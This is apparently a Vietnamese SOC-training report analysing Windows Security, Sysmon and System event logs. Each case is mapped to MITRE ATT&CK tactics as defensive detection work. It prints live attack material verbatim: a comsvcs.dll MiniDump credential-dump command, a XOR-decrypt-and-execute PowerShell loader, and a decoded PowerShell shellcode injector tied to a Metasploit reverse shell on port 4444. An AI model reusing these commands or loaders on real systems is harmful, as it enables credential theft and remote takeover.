

Tăng Thế Anh - Report

Security 1

Report 1:

- EventID: 4624
- Logged: 2/13/2019 10:15:36 PM
- Logon Type: 3 - Network.
- Security ID: NULL SID - Không xác định được subject xác thực new logon
- Account: NT AUTHORITY\ANONYMOUS LOGON
- Package Name: NTLM v1
- Workstation: PC01
- Source Network Address: 10.0.2.17
- Computer: PC02.example.corp

PC02 xác thực người dùng và cấp phiên đăng nhập là anonymous logon. Đây là một lỗi xác thực logon type 3 (SMB) hoặc 10 (RDP) khi đăng nhập ẩn danh, thực chất đây là failure logon dù trả về 4624.

Attacker thực hiện hành vi truy cập tới một shared folder với lệnh: `net use \\PC02\ipc$ "" /user:""` hoặc đăng nhập RDP sai mật khẩu nhằm thăm dò lỗ hổng.

⇒ Cần xác minh từ tier 2.

Report 2:

- EventID: 4624
- Logged: 2/13/2019 10:26:53 PM
- Account Name: PC02\IEUser - Normal User
- Logon Type: 10 - RDP
- Workstation Name: PC02
- Source Network Address: 127.0.0.1
- Computer: PC02.example.corp

Attacker có quyền truy cập vào máy PC02 với quyền SYSTEM và mạo danh IEUSER bằng việc kết nối RDP tới chính nó.

Local user IEUSER đăng nhập xác thực RDP với ip loopback 127.0.0.1 → Dấu hiệu **RDP Tunneling Attack**.

- Tactic: Protocol Tunneling - RDP (T1572)

⇒ True Positive.

Sysmon 1

Report:

- EventID: 1, 7
- UtcTime: 2019-08-30 12:54:07.823
- ParentImage: C:\Windows\System32\cmd.exe
- Image: C:\Windows\System32\cscript.exe
- Commandline: `cscript c:\ProgramData\memdump.vbs notepad.exe`
- ImageLoaded: C:\Windows\System32\scobj.dll
- ImageLoaded: C:\Windows\System32\wbem\wmiutils.dll
- Signed: Microsoft Windows
- Signature: Valid
- User: MSEDGEWIN10\IEUser

Attacker load các dll được xác nhận bởi microsoft windows để thực thi file VBS có hành vi dumping notepad.exe thông qua script.exe.

- EventID: 1, 10, 11
- UtcTime: 2019-08-30 12:54:08.331
- ParentImage: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
- SourceImage: C:\Windows\system32\rundll32.exe
- TargetImage: C:\Windows\system32\notepad.exe
- Commandline: `rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full`
- User: MSEDGEWIN10\IEUser

Attacker đã chiếm được MSEDGEWIN10 computer và IEUser có quyền SeDebugPrivilege rồi thực hiện dumping notepad.exe process (PID 4868) bằng **rundll32 comsvcs.dll** và lưu kết quả vào notepad.bin. Bên cạnh đó, attacker thực thi dumping command thông qua việc đăng kí Windows Management Instrumentation (WMI) event.

Tactic:

- OS Credential Dumping - notepad memory
- Event Triggered Execution: Windows Management Instrumentation Event Subscription
- Command and Scripting Interpreter: CMD
- Command and Scripting Interpreter: Visual Basic (T1059.005)
- System Binary Proxy Execution: Rundll32 (T1218.011)

⇒ True Positive.

Sysmon 2

Report:

- EventID: 10, 11
- SourceImage:
 - C:\Users\IEUser\Desktop\procdump.exe - UtcTime: 2019-03-17 19:09:41.318
 - C:\Windows\system32\taskmgr.exe - UtcTime: 2019-03-17 19:10:02.058
- TargetImage: C:\Windows\system32\lsass.exe
- TargetFileName:
 - C:\Users\IEUser\Desktop\lsass.exe_190317_120941.dmp
 - C:\Users\IEUser\AppData\Local\Temp\lsass (2).DMP
- Computer: PC04.example.corp

Summary: Attacker đã chiếm PC04 và đăng nhập vào user có quyền SeDebugPrivilege nhằm dumping lsass.exe (PID 476) bằng taskmgr.exe và procdump.exe rồi lưu kết quả vào các file dmp.

Tactic: OS Credential Dumping - lsass memory.

⇒ True Positive.

Sysmon 3

Report:

- EventID: 1
- UtcTime: 2019-05-27 01:28:42.700
- ParentImage: w3wp.exe - Web Server process
- ParentCommandline: `c:\windows\system32\inetssrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h "C:\inetpub\temp\appools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20`
- Image: `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`
- User: IIS APPPOOL\DefaultAppPool
- Computer: `IEWIN7`

Attacker đã thả một webshell vào webserver (IEWIN7), có thể ở folder wwwroot nhằm persistence và thực thi powershell payload.

Deobfuscated Powershell:

```

1  $ProgressPreference = "SilentlyContinue";
2  $path_in_module="C:\Windows\Temp\6jrxk3\gfg9i";
3  $path_in_app_code="C:\Windows\Temp\6jrxk3\nja9t64rrlu8";
4  $key=
   [System.Text.Encoding]::UTF8.GetBytes('8d969eef6ecad3c29a3a629280e686cf0c3f5d5a86aff3
5  $enc_module=[System.IO.File]::ReadAllBytes($path_in_module);
6  $enc_app_code=[System.IO.File]::ReadAllBytes($path_in_app_code);
7  $dec_module=New-Object Byte[] $enc_module.Length;
8  $dec_app_code=New-Object Byte[] $enc_app_code.Length;
9  for ($i = 0; $i -lt $enc_module.Length; $i++) {

```

```

10     $dec_module[$i] = $enc_module[$i] -bxor $key[$i % $key.Length];
11 };
12 for ($i = 0; $i -lt $enc_app_code.Length; $i++) {
13     $dec_app_code[$i] = $enc_app_code[$i] -bxor $key[$i % $key.Length];
14 };
15 $dec_module=[System.Text.Encoding]::UTF8.GetString($dec_module);
16 $dec_app_code=[System.Text.Encoding]::UTF8.GetString($dec_app_code);
17 $($dec_module+$dec_app_code)|iex;Remove-Item -Path $path_in_app_code -Force 2>&1 | Out-Null

```

⇒ Process chạy slint, decrypt hai script đặt ở Temp folder thành plaintext nhằm thực thi chúng, cuối cùng che giấu vết bằng cách xóa chúng đi.

- EventID: 1
- Image: C:\Windows\System32\inetsrv\apcmd.exe
- ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Sau đó, powershell.exe tạo apcmd.exe nhằm thực hiện Discovery.

Summary: Attacker đã thả một webshell vào webserver (IEWIN7), có thể ở folder wwwroot nhằm thực thi powershell payload. Powershell.exe chạy slint, decrypt hai script đặt ở Temp folder thành plaintext nhằm thực thi chúng, cuối cùng che giấu vết bằng cách xóa chúng đi. Cuối cùng, powershell.exe tạo apcmd.exe nhằm thực hiện Software Discovery thông qua các command `list vdir` và `list apppools`.

Tactic:

- Server Software Component: Web Shell
- Indicator Removal: File Deletion
- Software Discovery (T1518)
- Command and Scripting Interpreter: PowerShell
- Obfuscated Files or Information: Command Obfuscation (T1027.010)

⇒ True Positive.

Sysmon 4

Report:

- EventID: 1, 10, 13
 - UtcTime: 2019-04-30 20:26:51.934
 - ProcessId: 460
 - Image: C:\Windows\system32\services.exe
 - TargetObject: HKLM\System\CurrentControlSet\services\hello\Start
 - TargetObject: HKLM\System\CurrentControlSet\services\hello\ImagePath
 - Details: `%%COMSPEC%% /b /c start /b /min powershell.exe -nop -w hidden ...`
 - Computer: IEWIN7

Attacker đã tạo ra các registry thuộc service với quyền hạn cao nhất (HKLM) nhằm thực hiện persistence và thực thi powershell trên cmd.

Decompressed and decoding Powershell Command:

```
PS C:\Users\DELL\Downloads\SOC Training\Test1> .\decode.ps1
function bmj90 {
    Param ($eX, $iM)
    $e2 = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    return $e2.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef] (New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($e2.GetMethod('GetModuleHandle')).Invoke($null, @($eX)))), $iM))
}

function qKXi {
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $fG,
        [Parameter(Position = 1)] [Type] $oZWx = [Void]
    )

    $wt = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $wt.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $fG).SetImplementationFlags('Runtime, Managed')
    $wt.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $oZWx, $fG).SetImplementationFlags('Runtime, Managed')
}

return $wt.CreateType()

[Byte[]]$zY = [System.Convert]::FromBase64String("/0iCAAAAYInLmcBk1Aw1lM1lIUI3IoD7dKJh/rDxhfAIsIMHPDQH4vJSV4tSEItKPitMEXjjsAHURVtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR5FiLWB082aLDEuLWB084EiwH0iUQkJftbVvLaUf/gX19aixLrjV1oMzIAAGh3czJfVGHMdyYHiej/0LiQAQAAMcRUUGggGSA/9VqCmqKAATaAIAEVyJ5lBQUFBAUEB0a0oP3+D/1ZdqEFZXaJmldGH/1YXAdAr/Tgh170hAAAAagBqBFZXAALZyF//1YP4AH42izZqQcGAEEAAVmoAaFikU+X/1ZNTagBWUidoAtnIX//Vg/gAfShYaABAAABqAFBoCy8PMP/VV2h1bk1h/9VeXv8MJA+FcP//+mb///AcMpxnXBw7vgHSoKaKaVvZ3/1TwGfaQA++B1BbtHE3JvagBT/9U=")

$fzhZ = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((bmj90 kernel32.dll VirtualAlloc), (qKXi @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $zY.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($zY, 0, $fzhZ, $zY.Length)

$hRVr4 = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((bmj90 kernel32.dll CreateThread), (qKXi @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero, 0, $fzhZ, [IntPtr]::Zero, 0, [IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((bmj90 kernel32.dll WaitForSingleObject), (qKXi @([IntPtr], [Int32]))).Invoke($hRVr4, 0xffffffff) | Out-Null
```

- EventID: 10
 - UtcTime: 2019-04-30 20:26:52.356
 - Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 - SourceImage: 50\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Powershell.exe thực hiện hành vi process Injection vào chính powershell.exe đây bằng cách hàm API cấp thấp.

- EventID: 3
 - UtcTime: 2019-04-30 20:26:51.599
 - Initiated: false
 - SourceIp: 10.0.2.18
 - SourceHostname: IEWIN7
 - SourcePort: 445
 - SourcePortName: microsoft-ds
 - DestinationIsIpv6: false
 - DestinationIp: 10.0.2.19
 - DestinationHostname:
 - DestinationPort: 33801

Attacker đã dùng powershell khai thác lỗ hổng trên SMB port 445 ép buộc IEWIN7 tự động kết nối ra ngoài (**Initiated: false**).

- EventID: 3
 - UtcTime: 2019-04-30 20:26:52.794
 - Initiated: true
 - SourceIp: 10.0.2.18
 - SourceHostname: IEWIN7

- SourcePort: 49160
- SourcePortName:
- DestinationIsIpv6: false
- DestinationIp: 10.0.2.19
- DestinationHostname:
- DestinationPort: 4444

Powershell kết nối tới địa chỉ 10.0.2.19 qua cổng 4444 với quyền SYSTEM, trong khi đó port 4444 là port đặc trưng của Metasploit → **Dấu hiệu reverse shell.**

Summary: Attacker đã chiếm quyền kiểm soát máy tính, phát hiện từ việc set value Service HKLM registry, tạo ra một service tên Hello thực thi powershell script được mã hóa. Khi service bắt đầu, services.exe tạo ra cmd.exe (%COMSPEC%) thực hiện hành vi access tới powershell.exe nhằm thực thi payload. Cuối cùng, powershell.exe thực hiện hành vi self-injection và thiết lập kết nối tới computer ip 10.0.2.19 trong network bằng việc khai thác lỗ hổng SMB và dùng Metasploit.

Tactic:

- Hijack Execution Flow: Services Registry Permissions Weakness (T1574.011)
- Command and Scripting Interpreter: PowerShell
- Command and Scripting Interpreter: CMD
- Obfuscated Files or Information: Command Obfuscation (T1027.010)
- Obfuscated Files or Information: Compression (T1027.015)
- Process Injection (T1055.003)
- Command and Control - Non-Standard Port (T1571)

⇒ True Positive.

Sysmon 6

Report:

- EventID: 1
- UtcTime: 2021-11-08 15:01:27.604
- Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
- CommandLine: powershell \$env:I4Pzl|. (Get-Command ('{1}e{0}'-f'x','i'))
- ParentImage: C:\Windows\System32\wbem\WmiPrvSE.exe
- ParentCommandLine: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
- User: OFFSEC\admmig
- LogonId: 0x35D1AAD
- TerminalSessionId: 0
- IntegrityLevel: High
- Computer: fs03vuln.offsec.lan

Deobfuscation: `powershell $env:I4Pzl | iex`

Summary: Attacker đã chiếm fs03vuln.offsec.lan PC và đăng nhập vào privileged local admin là OFFSEC\admmig. Sau đó, thực hiện thiết lập persistence thông qua việc thực thi obfuscated powershell.exe được kích hoạt bởi WMI event subscription.

Trước khi thực thi powershell, attacker tạo một malicious environment variable gọi là I4Pzl.

Tactic:

- Event Triggered Execution: Windows Management Instrumentation Event Subscription
- Command and Scripting Interpreter: PowerShell
- Obfuscated Files or Information: Command Obfuscation (T1027.010)

⇒ True Positive.

System

Report:

- EventID: 7045
- Logged: 11/3/2021 3:15:15 PM (UTC: +7)
- Service File Name: `c:\windows\system32\cmd.exe /c powershell -command "Get-Service "seg1" | select -Expand DisplayName | out-file -append tmp_payload.txt"`
- Service Type: user mode service
- Service Start Type: demand start
- Service Account: LocalSystem
- Computer: FS03.offsec.lan

Summary: Attacker đã chiếm quyền kiểm soát máy tính với quyền LocalSystem . Sau đó, attacker tạo hàng loạt các service nhằm lấy thông tin các service khác (Get-Service) rồi lưu kết quả vào file txt.

Tactic:

- Create or Modify System Process: Windows Service (T1543.003)
- Command and Scripting Interpreter: PowerShell
- Command and Scripting Interpreter: CMD
- System Service Discovery (T1007)

⇒ True Positive.